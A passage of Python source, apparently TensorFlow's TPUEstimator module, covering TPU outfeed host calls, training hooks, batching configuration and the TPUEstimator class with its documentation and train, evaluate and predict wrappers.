self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
def create_enqueue_op(self):
"""Create the op to enqueue the recorded host_calls.
Returns:
A list of enqueue ops, which is empty if there are no host calls.
"""
if not self._names:
return []
tensors = []
# TODO(jhseu): Consider deduping tensors.
for name in self._names:
tensors.extend(self._tensors[name])
with ops.device(tpu.core(0)):
return [tpu_ops.outfeed_enqueue_tuple(tensors)]
def create_tpu_hostcall(self):
"""Sends the tensors through outfeed and runs the host_fn on CPU.
The tensors are concatenated along dimension 0 to form a global tensor
across all shards. The concatenated function is passed to the host_fn and
executed on the first host.
Returns:
A dictionary mapping name to the return type of the host_call by that
name.
Raises:
RuntimeError: If outfeed tensor is scalar.
"""
if not self._names:
return {}
ret = {}
# For each i, dequeue_ops[i] is a list containing the tensors from all
# shards. This list is concatenated later.
dequeue_ops = []
tensor_dtypes = []
tensor_shapes = []
for name in self._names:
for _ in self._tensors[name]:
dequeue_ops.append([])
for dtype in self._tensor_dtypes[name]:
tensor_dtypes.append(dtype)
for shape in self._tensor_shapes[name]:
tensor_shapes.append(shape)
# Outfeed ops execute on each replica's first logical core. Note: we must
# constraint it such that we have at most one outfeed dequeue and enqueue
# per replica.
for i in xrange(self._ctx.num_replicas):
host_device, ordinal_id = self._ctx.device_for_replica(i)
with ops.device(host_device):
outfeed_tensors = tpu_ops.outfeed_dequeue_tuple(
dtypes=tensor_dtypes,
shapes=tensor_shapes,
device_ordinal=ordinal_id)
for j, item in enumerate(outfeed_tensors):
dequeue_ops[j].append(item)
# Deconstruct dequeue ops.
flat_dequeue_ops = []
for l in dequeue_ops:
flat_dequeue_ops.extend(l)
dequeue_ops_by_name = {}
pos = 0
for name in self._names:
dequeue_ops_by_name[name] = dequeue_ops[pos:pos +
len(self._tensors[name])]
pos += len(self._tensors[name])
def _call_host_fn(fn, *args, **kw):
context = CatchInvalidHostcallFunctions()
context.Enter()
result = fn(*args, **kw)
context.Exit()
context.ExitResult(result)
return result
# It is assumed evaluation always happens on single host TPU system. So,
# place all ops on tpu host if possible.
#
# TODO(jhseu): Evaluate whether this is right for summaries.
with ops.device(self._ctx.tpu_host_placement_function(replica_id=0)):
for name in self._names:
dequeue_ops = dequeue_ops_by_name[name]
for i, item in enumerate(dequeue_ops):
if dequeue_ops[i][0].shape.ndims == 0:
raise RuntimeError(
'All tensors outfed from TPU should preserve batch size '
'dimension, but got scalar {}'.format(dequeue_ops[i][0]))
# TODO(xiejw): Make the specification of the outfeed combinaton
# function more explicit and well-documented. We may want to give the
# user the option of concatenating along any axis.
if (self._ctx.config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.BROADCAST):
# If the infeed is in BROADCAST mode (each core recieving the same
# input), then we assume that the cores also produce identical
# copies of the same output, and we simply take the output from
# the first core. This mode is used by Mesh-TensorFlow.
with ops.control_dependencies(dequeue_ops[i]):
dequeue_ops[i] = array_ops.identity(dequeue_ops[i][0])
else:
# Assume that the input has been batch-split and that axis 0 of the
# output tensors represents the batch size. Concatenate along
# the axis 0 to re-combine the batch.
dequeue_ops[i] = array_ops.concat(dequeue_ops[i], axis=0)
if self._tensor_keys[name] is not None:
# The user-provided eval_metrics[1] is a dict.
dequeue_ops = dict(zip(self._tensor_keys[name], dequeue_ops))
try:
ret[name] = _call_host_fn(self._host_fns[name], **dequeue_ops)
except TypeError as e:
logging.warning(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise
else:
ret[name] = _call_host_fn(self._host_fns[name], *dequeue_ops)
# force all dequeue operations to be run if not consumed by the host calls
ret['__force_dequeue'] = control_flow_ops.group(*flat_dequeue_ops)
return ret
class _OutfeedHostCallHook(session_run_hook.SessionRunHook):
"""Hook to run host calls when use_tpu=False."""
def __init__(self, tensors):
self._tensors = tensors
def begin(self):
# We duplicate this code from the TPUInfeedOutfeedSessionHook rather than
# create a separate hook to guarantee execution order, because summaries
# need to be initialized before the outfeed thread starts.
# TODO(jhseu): Make a wrapper hook instead?
self._init_ops = contrib_summary.summary_writer_initializer_op()
# Get all the writer resources from the initializer, so we know what to
# flush.
self._finalize_ops = []
for op in self._init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def after_create_session(self, session, coord):
session.run(self._init_ops)
def before_run(self, run_context):
return basic_session_run_hooks.SessionRunArgs(self._tensors)
def end(self, session):
session.run(self._finalize_ops)
class ExamplesPerSecondHook(basic_session_run_hooks.StepCounterHook):
"""Calculate and report global_step/sec and examples/sec during runtime."""
def __init__(self,
batch_size,
every_n_steps=100,
every_n_secs=None,
output_dir=None,
summary_writer=None):
self._batch_size = batch_size
super(ExamplesPerSecondHook, self).__init__(
every_n_steps=every_n_steps,
every_n_secs=every_n_secs,
output_dir=output_dir,
summary_writer=summary_writer)
def _log_and_record(self, elapsed_steps, elapsed_time, global_step):
global_step_per_sec = elapsed_steps / elapsed_time
examples_per_sec = self._batch_size * global_step_per_sec
if self._summary_writer is not None:
global_step_summary = Summary(value=[
Summary.Value(tag='global_step/sec', simple_value=global_step_per_sec)
])
example_summary = Summary(value=[
Summary.Value(tag='examples/sec', simple_value=examples_per_sec)
])
self._summary_writer.add_summary(global_step_summary, global_step)
self._summary_writer.add_summary(example_summary, global_step)
logging.info('global_step/sec: %g', global_step_per_sec)
logging.info('examples/sec: %g', examples_per_sec)
class InstallSignalHandlerHook(session_run_hook.SessionRunHook):
"""Change SIGINT (CTRL^C) handler to force quit the process.
The default behavior often results in hanging processes.
The original handler is restored after training/evaluation.
"""
def __init__(self):
self._signal_fn = signal.getsignal(signal.SIGINT)
def before_run(self, run_context):
signal.signal(signal.SIGINT, signal.SIG_DFL)
def end(self, session):
signal.signal(signal.SIGINT, self._signal_fn)
class ExportSavedModelApiVersion(enum.Enum):
V1 = 1
V2 = 2
class BatchConfig(
collections.namedtuple('BatchConfig', [
'num_batch_threads', 'max_batch_size', 'batch_timeout_micros',
'allowed_batch_sizes', 'max_enqueued_batches'
])):
"""Class to handle config inputs into the batching function."""
def __new__(cls,
num_batch_threads,
max_batch_size,
batch_timeout_micros,
allowed_batch_sizes,
max_enqueued_batches=10):
"""Creates an EmbeddingConfigSpec instance.
Args:
num_batch_threads: Number of scheduling threads for processing batches of
work. Determines the number of batches processed in parallel.
max_batch_size: Batch sizes will never be bigger than this.
batch_timeout_micros: Maximum number of microseconds to wait before
outputting an incomplete batch.
allowed_batch_sizes: Optional list of allowed batch sizes. If left empty,
does nothing. Otherwise, supplies a list of batch sizes, causing the op
to pad batches up to one of those sizes. The entries must increase
monotonically, and the final entry must equal max_batch_size.
max_enqueued_batches: The maximum depth of the batch queue. Defaults to
10.
Returns:
An BatchConfig instance.
"""
return super(BatchConfig, cls).__new__(
cls,
num_batch_threads=num_batch_threads,
max_batch_size=max_batch_size,
batch_timeout_micros=batch_timeout_micros,
allowed_batch_sizes=allowed_batch_sizes,
max_enqueued_batches=max_enqueued_batches)
@estimator_export(v1=['estimator.tpu.TPUEstimator'])
class TPUEstimator(estimator_lib.Estimator):
"""Estimator with TPU support.
TPUEstimator also supports training on CPU and GPU. You don't need to define
a separate `tf.estimator.Estimator`.
TPUEstimator handles many of the details of running on TPU devices, such as
replicating inputs and models for each core, and returning to host
periodically to run hooks.
TPUEstimator transforms a global batch size in params to a per-shard batch
size when calling the `input_fn` and `model_fn`. Users should specify
global batch size in constructor, and then get the batch size for each shard
in `input_fn` and `model_fn` by `params['batch_size']`.
- For training, `model_fn` gets per-core batch size; `input_fn` may get
per-core or per-host batch size depending on `per_host_input_for_training`
in `TPUConfig` (See docstring for TPUConfig for details).
- For evaluation and prediction, `model_fn` gets per-core batch size and
`input_fn` get per-host batch size.
Evaluation
==========
`model_fn` should return `TPUEstimatorSpec`, which expects the `eval_metrics`
for TPU evaluation. If eval_on_tpu is False, the evaluation will execute on
CPU or GPU; in this case the following discussion on TPU evaluation does not
apply.
`TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`, where
`tensors` could be a list of any nested structure of `Tensor`s (See
`TPUEstimatorSpec` for details). `metric_fn` takes the `tensors` and returns
a dict from metric string name to the result of calling a metric function,
namely a `(metric_tensor, update_op)` tuple.
One can set `use_tpu` to `False` for testing. All training, evaluation, and
predict will be executed on CPU. `input_fn` and `model_fn` will receive
`train_batch_size` or `eval_batch_size` unmodified as `params['batch_size']`.
Current limitations:
--------------------
1. TPU evaluation only works on a single host (one TPU worker) except
BROADCAST mode.
2. `input_fn` for evaluation should **NOT** raise an end-of-input exception
(`OutOfRangeError` or `StopIteration`). And all evaluation steps and all
batches should have the same size.
Example (MNIST):
----------------
```
# The metric Fn which runs on CPU.
def metric_fn(labels, logits):
predictions = tf.argmax(logits, 1)
return {
'accuracy': tf.compat.v1.metrics.precision(
labels=labels, predictions=predictions),
}
# Your model Fn which runs on TPU (eval_metrics is list in this example)
def model_fn(features, labels, mode, config, params):
...
logits = ...
if mode = tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, [labels, logits]))
# or specify the eval_metrics tensors as dict.
def model_fn(features, labels, mode, config, params):
...
final_layer_output = ...
if mode = tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, {
'labels': labels,
'logits': final_layer_output,
}))
```
Prediction
==========
Prediction on TPU is an experimental feature to support large batch inference.
It is not designed for latency-critical system. In addition, due to some
usability issues, for prediction with small dataset, CPU `.predict`, i.e.,
creating a new `TPUEstimator` instance with `use_tpu=False`, might be more
convenient.
Note: In contrast to TPU training/evaluation, the `input_fn` for prediction
*should* raise an end-of-input exception (`OutOfRangeError` or
`StopIteration`), which serves as the stopping signal to `TPUEstimator`. To be
precise, the ops created by `input_fn` produce one batch of the data.
The `predict()` API processes one batch at a time. When reaching the end of
the data source, an end-of-input exception should be raised by one of these
operations. The user usually does not need to do this manually. As long as the
dataset is not repeated forever, the `tf.data` API will raise an end-of-input
exception automatically after the last batch has been produced.
Note: Estimator.predict returns a Python generator. Please consume all the
data from the generator so that TPUEstimator can shutdown the TPU system
properly for user.
Current limitations:
--------------------
1. TPU prediction only works on a single host (one TPU worker).
2. `input_fn` must return a `Dataset` instance rather than `features`. In
fact, .train() and .evaluate() also support Dataset as return value.
Example (MNIST):
----------------
```
height = 32
width = 32
total_examples = 100
def predict_input_fn(params):
batch_size = params['batch_size']
images = tf.random.uniform(
[total_examples, height, width, 3], minval=-1, maxval=1)
dataset = tf.data.Dataset.from_tensor_slices(images)
dataset = dataset.map(lambda images: {'image': images})
dataset = dataset.batch(batch_size)
return dataset
def model_fn(features, labels, params, mode):
# Generate predictions, called 'output', from features['image']
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.contrib.tpu.TPUEstimatorSpec(
mode=mode,
predictions={
'predictions': output,
'is_padding': features['is_padding']
})
tpu_est = TPUEstimator(
model_fn=model_fn,
...,
predict_batch_size=16)
# Fully consume the generator so that TPUEstimator can shutdown the TPU
# system.
for item in tpu_est.predict(input_fn=input_fn):
# Filter out item if the `is_padding` is 1.
# Process the 'predictions'
```
Exporting
=========
`export_saved_model` exports 2 metagraphs, one with `saved_model.SERVING`, and
another with `saved_model.SERVING` and `saved_model.TPU` tags. At serving
time, these tags are used to select the appropriate metagraph to load.
Before running the graph on TPU, the TPU system needs to be initialized. If
TensorFlow Serving model-server is used, this is done automatically. If not,
please use `session.run(tpu.initialize_system())`.
There are two versions of the API: ExportSavedModelApiVersion.V1 and V2.
In V1, the exported CPU graph is `model_fn` as it is. The exported TPU graph
wraps `tpu.rewrite()` and `TPUPartitionedCallOp` around `model_fn` so
`model_fn` is on TPU by default. To place ops on CPU,
`tpu.outside_compilation(host_call, logits)` can be used.
Example:
----------------
```
def model_fn(features, labels, mode, config, params):
...
logits = ...
export_outputs = {
'logits': export_output_lib.PredictOutput(
{'logits': logits})
}
def host_call(logits):
class_ids = math_ops.argmax(logits)
classes = string_ops.as_string(class_ids)
export_outputs['classes'] =
export_output_lib.ClassificationOutput(classes=classes)
tpu.outside_compilation(host_call, logits)
...
```
In V2, `export_saved_model()` sets up `params['use_tpu']` flag to let the user
know if the code is exporting to TPU (or not). When `params['use_tpu']` is
`True`, users need to call `tpu.rewrite()`, `TPUPartitionedCallOp` and/or
`batch_function()`. Alternatively use `inference_on_tpu()` which is a
convenience wrapper of the three.
```
def model_fn(features, labels, mode, config, params):
...
# This could be some pre-processing on CPU like calls to input layer with
# embedding columns.
x2 = features['x'] * 2
def computation(input_tensor):
return layers.dense(
input_tensor, 1, kernel_initializer=init_ops.zeros_initializer())
inputs = [x2]
if params['use_tpu']:
predictions = array_ops.identity(
tpu_estimator.inference_on_tpu(computation, inputs,
num_batch_threads=1, max_batch_size=2, batch_timeout_micros=100),
name='predictions')
else:
predictions = array_ops.identity(
computation(*inputs), name='predictions')
key = signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY
export_outputs = {
key: export_lib.PredictOutput({'prediction': predictions})
}
...
```
TIP: V2 is recommended as it is more flexible (eg: batching, etc).
"""
def __init__(self,
model_fn=None,
model_dir=None,
config=None,
params=None,
use_tpu=True,
train_batch_size=None,
eval_batch_size=None,
predict_batch_size=None,
batch_axis=None,
eval_on_tpu=True,
export_to_tpu=True,
export_to_cpu=True,
warm_start_from=None,
experimental_export_device_assignment=False,
embedding_config_spec=None,
export_saved_model_api_version=ExportSavedModelApiVersion.V1):
"""Constructs an `TPUEstimator` instance.
Args:
model_fn: Model function as required by `Estimator` which returns
EstimatorSpec or TPUEstimatorSpec. `training_hooks`, 'evaluation_hooks',
and `prediction_hooks` must not capure any TPU Tensor inside the
model_fn.
model_dir: Directory to save model parameters, graph and etc. This can
also be used to load checkpoints from the directory into a estimator to
continue training a previously saved model. If `None`, the model_dir in
`config` will be used if set. If both are set, they must be same. If
both are `None`, a temporary directory will be used.
config: An `tpu_config.RunConfig` configuration object. Cannot be `None`.
params: An optional `dict` of hyper parameters that will be passed into
`input_fn` and `model_fn`. Keys are names of parameters, values are
basic python types. There are reserved keys for `TPUEstimator`,
including 'batch_size'.
use_tpu: A bool indicating whether TPU support is enabled. Currently, -
TPU training and evaluation respect this bit, but eval_on_tpu can
override execution of eval. See below. - Predict still happens on CPU.
train_batch_size: An int representing the global training batch size.
TPUEstimator transforms this global batch size to a per-shard batch
size, as params['batch_size'], when calling `input_fn` and `model_fn`.
Cannot be `None` if `use_tpu` is `True`. Must be divisible by total
number of replicas.
eval_batch_size: An int representing evaluation batch size. Must be
divisible by total number of replicas.
predict_batch_size: An int representing the prediction batch size. Must be
divisible by total number of replicas.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards. For example, if your input_fn produced (images, labels)
where the images tensor is in `HWCN` format, your shard dimensions would
be [3, 0], where 3 corresponds to the `N` dimension of your images
Tensor, and 0 corresponds to the dimension along which to split the
labels to match up with the corresponding images. If None is supplied,
and per_host_input_for_training is True, batches will be sharded based
on the major dimension. If tpu_config.per_host_input_for_training is
False or `PER_HOST_V2`, batch_axis is ignored.
eval_on_tpu: If False, evaluation runs on CPU or GPU. In this case, the
model_fn must return `EstimatorSpec` when called with `mode` as `EVAL`.
export_to_tpu: If True, `export_saved_model()` exports a metagraph for
serving on TPU. Note that unsupported export modes such as EVAL will be
ignored. For those modes, only a CPU model will be exported.
Currently, export_to_tpu only supports PREDICT.
export_to_cpu: If True, `export_saved_model()` exports a metagraph for
serving on CPU.
warm_start_from: Optional string filepath to a checkpoint or SavedModel to
warm-start from, or a `tf.estimator.WarmStartSettings` object to fully
configure warm-starting. If the string filepath is provided instead of
a `WarmStartSettings`, then all variables are warm-started, and it is
assumed that vocabularies and Tensor names are unchanged.
experimental_export_device_assignment: Whether to include the device
assignment in the exported model. Doing so is useful in case of model
parallel inference but will tie the exported model to the TPU topology
used to export the model.
embedding_config_spec: Optional EmbeddingConfigSpec instance
to support using TPU embedding.
export_saved_model_api_version: ExportSavedModelApiVersion, V1 or V2.
With V1, `export_saved_model()` adds rewrite() and TPUPartitionedCallOp()
for user; while in v2, user is expected to add rewrite(),
TPUPartitionedCallOp() etc in their model_fn.
A helper function `inference_on_tpu` is provided for V2.
brn_tpu_estimator.py includes examples for both versions
i.e. TPUEstimatorExportTest and TPUEstimatorExportV2Test.
Raises:
ValueError: `params` has reserved keys already.
"""
if config is None or not isinstance(config, tpu_config.RunConfig):
raise ValueError(
'`config` must be provided with type `tpu_config.RunConfig`')
if params is not None and any(k in params for k in _RESERVED_PARAMS_KEYS):
raise ValueError('{} are reserved keys but existed in params {}.'.format(
_RESERVED_PARAMS_KEYS, params))
if use_tpu:
# Perform some very basic validations. More validations will be found in
# _InternalTPUContext.
if train_batch_size is None:
raise ValueError('`train_batch_size` cannot be `None`')
util_lib.check_positive_integer(train_batch_size, 'train_batch_size')
if (config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.PER_SHARD_V1 and
config.tpu_config.num_cores_per_replica):
raise ValueError(
'Model parallelism only supports per host input for training. '
'Please adjust TPURunconfig.per_host_input_for_training.')
if eval_batch_size is not None:
util_lib.check_positive_integer(eval_batch_size, 'eval_batch_size')
if predict_batch_size is not None:
util_lib.check_positive_integer(predict_batch_size,
'predict_batch_size')
if embedding_config_spec:
if (config.tpu_config.per_host_input_for_training !=
tpu_config.InputPipelineConfig.PER_HOST_V2):
raise ValueError('Only PER_HOST_V2 is supported when using TPU '
'Embedding; got {}.'.format(
config.tpu_config.per_host_input_for_training))
# Verifies the model_fn signature according to Estimator framework.
estimator_lib._verify_model_fn_args(model_fn, params) # pylint: disable=protected-access
# We cannot store config and params in this constructor as parent
# constructor might change them, such as assigning a temp dir for
# config.model_dir.
model_function = self._augment_model_fn(model_fn, batch_axis)
# Overwrite log_step_count_steps to disable TensorLoggingHook and
# StepCounterHook from being created in Estimator. TPUEstimator already
# added equivalent hooks in _augment_model_fn above.
self._log_every_n_steps = config.log_step_count_steps
config = config.replace(log_step_count_steps=None)
# Passing non-None params as wrapped model_fn has it.
params = params or {}
super(TPUEstimator, self).__init__(
model_fn=model_function,
model_dir=model_dir,
config=config,
params=params,
warm_start_from=warm_start_from)
self._iterations_per_training_loop = util_lib.parse_iterations_per_loop(
self._config.tpu_config.iterations_per_loop)
# In absence of an explicit `log_every_n_secs` config, if the
# `iterations_per_loop` value is specified as time in seconds, enable
# logging every n secs based on the `iterations_per_loop` value. A trade-off
# avoiding API change on the current release.
# TODO(henrytan): add `log_every_n_secs` to RunConfig.
if self._iterations_per_training_loop.unit == 'seconds':
self._log_every_n_secs = self._iterations_per_training_loop.value
self._log_every_n_steps = None
elif self._iterations_per_training_loop.unit == 'count':
if self._log_every_n_steps is not None:
# Each session.run() lasts for iterations_per_loop. We can't log
# in-between a session.run(), and we can only log after the
# `iterations_per_loop` steps, so we can only approximate. If a user
# requests to log every N steps, we actually want to roughly log every
# N / `iterations_per_loop` steps to match the original intention.
self._log_every_n_steps = (
int(math.ceil(float(self._log_every_n_steps) /
self._iterations_per_training_loop.value)))
self._log_every_n_secs = None
else:
assert False, ('Invalid TPUConfig `iterations_per_loop` value. '
'Indicates a bug in `iterations_per_loop` '
'parsing.')
# All properties passed to _InternalTPUContext are immutable.
# pylint: disable=protected-access
self._ctx = tpu_context._get_tpu_context(
self._config, train_batch_size, eval_batch_size, predict_batch_size,
use_tpu, eval_on_tpu, embedding_config_spec)
self._export_to_cpu = export_to_cpu
self._export_to_tpu = export_to_tpu
self._experimental_export_device_assignment = (
experimental_export_device_assignment)
if not isinstance(export_saved_model_api_version,
ExportSavedModelApiVersion):
raise ValueError('export_saved_model_api_version should be of type '
'ExportSavedModelApiVersion; got {}.'.format(
export_saved_model_api_version))
self._export_saved_model_api_version = export_saved_model_api_version
self._is_input_fn_invoked = None
self._rendezvous = {}
def _add_meta_graph_for_mode(self,
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables=True,
mode=model_fn_lib.ModeKeys.PREDICT,
export_tags=None,
check_variables=True,
strip_default_attrs=True):
if self._export_to_tpu and mode != model_fn_lib.ModeKeys.PREDICT:
logging.warning('TPUEstimator only handles mode PREDICT for exporting '
'when `export_to_tpu` is `True`; Mode {} will be ignored '
'for TPU.'.format(mode))
if not self._export_to_cpu and not self._export_to_tpu:
raise ValueError('One of export_to_cpu and export_to_tpu must be true.')
if self._export_to_cpu:
(super(TPUEstimator, self)._add_meta_graph_for_mode(
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables,
mode=mode,
export_tags=export_tags,
check_variables=check_variables,
strip_default_attrs=strip_default_attrs))
if self._export_to_tpu and mode == model_fn_lib.ModeKeys.PREDICT:
input_receiver_fn_map = {
_INFERENCE_ON_TPU_MODE: input_receiver_fn_map[mode]
}
export_tags = [tag_constants.SERVING, tag_constants.TPU]
mode = _INFERENCE_ON_TPU_MODE
# See b/110052256 for why `check_variables` is `False`.
if not self._export_to_cpu:
check_variables = save_variables = True
else:
check_variables = save_variables = False
(super(TPUEstimator, self)._add_meta_graph_for_mode(
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables=save_variables,
mode=mode,
export_tags=export_tags,
check_variables=check_variables,
strip_default_attrs=strip_default_attrs))
def _call_model_fn(self, features, labels, mode, config):
if self._export_saved_model_api_version == ExportSavedModelApiVersion.V1:
if mode == _INFERENCE_ON_TPU_MODE:
return self._call_model_fn_for_inference(features, labels, mode, config)
else:
return super(TPUEstimator, self)._call_model_fn(features, labels, mode,
config)
else:
return super(TPUEstimator, self)._call_model_fn(features, labels, mode,
config)
def _call_model_fn_for_inference(self, features, labels, mode, config):
"""Wraps `_call_model_fn` for `export_saved_model`."""
if mode != _INFERENCE_ON_TPU_MODE:
raise ValueError('mode must be {}; '
'got {}.'.format(_INFERENCE_ON_TPU_MODE, mode))
return model_fn_inference_on_tpu(
self._model_fn,
features,
labels,
config,
self._params,
batch_config=None,
experimental_export_device_assignment=self
._experimental_export_device_assignment,
call_context=self._ctx)
def _create_global_step(self, graph):
"""Creates a global step suitable for TPUs.
Args:
graph: The graph in which to create the global step.
Returns:
A global step `Tensor`.
Raises:
ValueError: if the global step tensor is already defined.
"""
return _create_global_step(graph)
def _convert_train_steps_to_hooks(self, steps, max_steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.TRAIN) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_train_steps_to_hooks(
steps, max_steps)
# On TPU.
if steps is None and max_steps is None:
raise ValueError(
'For TPU training, one of `steps` or `max_steps` must be set. '
'Cannot be both `None`.')
# Estimator.train has explicit positiveness check.
if steps is not None:
util_lib.check_positive_integer(steps, 'Train steps')
if max_steps is not None:
util_lib.check_positive_integer(max_steps, 'Train max_steps')
return [
_TPUStopAtStepHook(
self._iterations_per_training_loop, steps, max_steps)
]
def _convert_eval_steps_to_hooks(self, steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.EVAL) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_eval_steps_to_hooks(steps)
if steps is None:
raise ValueError('Evaluate `steps` must be set on TPU. Cannot be `None`.')
util_lib.check_positive_integer(steps, 'Eval steps')
return [
evaluation._StopAfterNEvalsHook( # pylint: disable=protected-access
num_evals=steps),
_SetEvalIterationsHook(steps)
]
def _call_input_fn(self, input_fn, mode):
"""Calls the input function.
Args:
input_fn: The input function.
mode: ModeKeys
Returns:
In TPU mode, returns an input_fn to be called later in model_fn.
Otherwise, calls the input_fn and returns either fatures or
(features, labels).
Raises:
ValueError: if input_fn takes invalid arguments or does not have `params`.
"""
input_fn_args = function_utils.fn_args(input_fn)
config = self.config # a deep copy.
kwargs = {}
if 'params' in input_fn_args:
kwargs['params'] = self.params # a deep copy.
else:
raise ValueError('input_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params["batch_size"]'.format(input_fn))
if 'config' in input_fn_args:
kwargs['config'] = config
if 'mode' in input_fn_args:
kwargs['mode'] = mode
# Records the fact input_fn has been invoked.
self._is_input_fn_invoked = True
with self._ctx.with_mode(mode) as ctx:
# Setting the batch size in params first. This helps user to have same
# input_fn for use_tpu=True/False.
batch_size_for_input_fn = ctx.batch_size_for_input_fn
if batch_size_for_input_fn is not None:
_add_item_to_params(kwargs['params'], _BATCH_SIZE_KEY,
batch_size_for_input_fn)
# For export_saved_model, input_fn is never passed to Estimator. So,
# `is_export_mode` must be False.
if ctx.is_running_on_cpu(is_export_mode=False):
with ops.device('/device:CPU:0'):
return input_fn(**kwargs)
# For TPU computation, input_fn should be invoked in a tf.while_loop for
# performance. While constructing the tf.while_loop, the structure of
# inputs returned by the `input_fn` needs to be recorded. The structure
# includes whether features or labels is dict or single Tensor, dict keys,
# tensor shapes, and dtypes. The recorded structure is used to create the
# infeed dequeue ops, which must be wrapped and passed as a Fn, called
# inside the TPU computation, as the TPU computation is wrapped inside a
# tf.while_loop also. So, we either pass input_fn to model_fn or pass
# dequeue_fn to model_fn. Here, `input_fn` is passed directly as
# `features` in `model_fn` signature.
def _input_fn(ctx):
_add_item_to_params(kwargs['params'], _CTX_KEY, ctx)
return input_fn(**kwargs)
return _input_fn
def _validate_features_in_predict_input(self, result):
"""Skip the validation.
For TPUEstimator, we do not need to check the result type. `_InputPipeline`
has stronger check. Parent class's check generates confusing warning msg.
Args:
result: `features` returned by input_fn.
"""
pass
def train(self,
input_fn,
hooks=None,
steps=None,
max_steps=None,
saving_listeners=None):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.TRAIN] = rendezvous
try:
return super(TPUEstimator, self).train(
input_fn=input_fn,
hooks=hooks,
steps=steps,
max_steps=max_steps,
saving_listeners=saving_listeners)
except Exception: # pylint: disable=broad-except
rendezvous.record_error('training_loop', sys.exc_info())
finally:
rendezvous.record_done('training_loop')
rendezvous.raise_errors()
def evaluate(self,
input_fn,
steps=None,
hooks=None,
checkpoint_path=None,
name=None):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.EVAL] = rendezvous
try:
return super(TPUEstimator, self).evaluate(
input_fn,
steps=steps,
hooks=hooks,
checkpoint_path=checkpoint_path,
name=name)
except Exception: # pylint: disable=broad-except
rendezvous.record_error('evaluation_loop', sys.exc_info())
finally:
rendezvous.record_done('evaluation_loop')
rendezvous.raise_errors()
def predict(self,
input_fn,
predict_keys=None,
hooks=None,
checkpoint_path=None,
yield_single_examples=True):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.PREDICT] = rendezvous
try:
for result in super(TPUEstimator, self).predict(
input_fn=input_fn,
predict_keys=predict_keys,
hooks=hooks,
checkpoint_path=checkpoint_path,
yield_single_examples=yield_single_examples):
yield result
except Exception: # pylint: disable=broad-except
rendezvous.record_error('prediction_loop', sys.exc_info())
finally:
rendezvous.record_done('prediction_loop')
rendezvous.raise_errors()
rendezvous.record_done('prediction_loop')
rendezvous.raise_errors()
def _augment_model_fn(self, model_fn, batch_axis):
"""Returns a new model_fn, which wraps the TPU support."""
def _model_fn(features, labels, mode, config, params):
"""A Estimator `model_fn` for TPUEstimator."""
# `input_fn` is called in `train()`, `evaluate()`, and `predict()`,
# but not in `export_saved_model()`.
if self._is_input_fn_invoked:
is_export_mode = False
else:
is_export_mode = True
# Clear the bit.
self._is_input_fn_invoked = None
if is_export_mode:
if mode == _INFERENCE_ON_TPU_MODE:
_add_item_to_params(params, _USE_TPU_KEY, True)
mode = model_fn_lib.ModeKeys.PREDICT
else:
_add_item_to_params(params, _USE_TPU_KEY, False)
with self._ctx.with_mode(mode) as ctx:
model_fn_wrapper = _ModelFnWrapper(model_fn, config, params, ctx)
# examples_hook is added to training_hooks for both CPU and TPU
# execution.
if (self._log_every_n_steps is not None
or self._log_every_n_secs is not None):
examples_hook = ExamplesPerSecondHook(
ctx.global_batch_size,
# pylint:disable=g-long-ternary
output_dir=(self.model_dir
if not config or config.save_summary_steps
else None),
# pylint:enable=g-long-ternary
every_n_steps=self._log_every_n_steps,
every_n_secs=self._log_every_n_secs)
if ctx.is_running_on_cpu(is_export_mode=is_export_mode):
logging.info('Running %s on CPU', mode)
estimator_spec = model_fn_wrapper.call_without_tpu(
features, labels, is_export_mode=is_export_mode)
if (self._log_every_n_steps is not None
or self._log_every_n_secs is not None):
estimator_spec = estimator_spec._replace(
training_hooks=estimator_spec.training_hooks + (examples_hook,))
return estimator_spec
assert labels is None, '`labels` passed to `model_fn` must be `None`.'
# TPUEstimator._call_input_fn passes `input_fn` as features to here.
assert callable(features), '`input_fn` is not callable.'
input_fn = features
tpu_init_ops = []
if ctx.embedding_config and mode == model_fn_lib.ModeKeys.TRAIN:
dummy_table_variables, dummy_table_variables_init = (
tpu_embedding_gradient.create_dummy_table_variables(
ctx.embedding_config.tpu_embedding))
ctx.embedding_config.dummy_table_variables = dummy_table_variables
tpu_init_ops.append(dummy_table_variables_init)
input_holders = _InputPipeline(input_fn, batch_axis, ctx)
enqueue_ops, dequeue_fn, input_hooks, run_infeed_loop_on_coordinator = (
input_holders.generate_infeed_enqueue_ops_and_dequeue_fn())
graph = ops.get_default_graph()
for enqueue_op in enqueue_ops:
if isinstance(enqueue_op, list):
graph.get_collection_ref(_TPU_ENQUEUE_OPS).extend(enqueue_op)
else:
graph.add_to_collection(_TPU_ENQUEUE_OPS, enqueue_op)
if mode == model_fn_lib.ModeKeys.TRAIN:
compile_op, loss, host_call, scaffold_fn, training_hooks = (
_train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
if ctx.embedding_config:
g = ops.get_default_graph()
